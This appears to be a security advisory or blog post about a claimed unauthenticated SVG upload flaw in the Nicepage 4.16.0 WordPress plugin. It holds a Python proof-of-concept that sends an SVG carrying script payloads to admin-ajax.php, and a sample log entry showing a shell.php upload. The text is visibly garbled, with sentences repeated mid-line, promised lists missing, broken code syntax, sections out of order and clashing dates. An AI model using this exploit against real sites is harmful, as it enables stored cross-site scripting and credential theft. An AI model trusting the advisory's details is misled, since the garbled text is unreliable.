If you have used Nicepage plugin 4.16.0, perform the following checks:
As of publication, our telemetry (from Sucuri's SiteCheck, Wordfence, and public Intezer reports) shows low active exploitation:
However, threat actors have integrated the exploit into automated scanners like WPScan and Nuclei templates as of April 2026. Expect increased noise.
The following simplified Python snippet demonstrates the unauthenticated SVG upload (truncated for safety): nicepage 4.16.0 exploit
import requeststarget_url = "https://target-site.com/wp-admin/admin-ajax.php" payload_svg = '''<svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')"> <script>alert('Nicepage 4.16.0 Exploit')</script> </svg>'''
files = 'svg_file': ('malicious.svg', payload_svg, 'image/svg+xml') data = 'action': 'nicepage_upload_svg'
response = requests.post(target_url, data=data, files=files) print(response.text)If you have used Nicepage plugin 4
In a real attack, the onload script would redirect to a credential harvester or exploit a browser vulnerability.
Search your access logs for admin-ajax.php requests containing strings like: However, threat actors have integrated the exploit into
Example suspicious log entry:
192.168.1.100 - - [12/Jan/2025:13:45:22] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 1234 "Mozilla/5.0" "cmd=upload&file=shell.php"
If you suspect your site was compromised via the Nicepage 4.16.0 exploit, perform the following forensic checks:
Before diving into the exploit, it is essential to understand the software architecture. Nicepage is a desktop website builder available for Windows, Mac, and Linux. It also offers a companion plugin for WordPress and a theme for Joomla. The software works on a "save locally, publish remotely" model. Users design websites locally (creating .nicepage files) and then export them as HTML/CSS or synchronize them with a CMS via an API.
Version 4.16.0, released in late 2025, was a significant update that introduced dynamic content widgets, improved SVG handling, and a new "remote publish" protocol.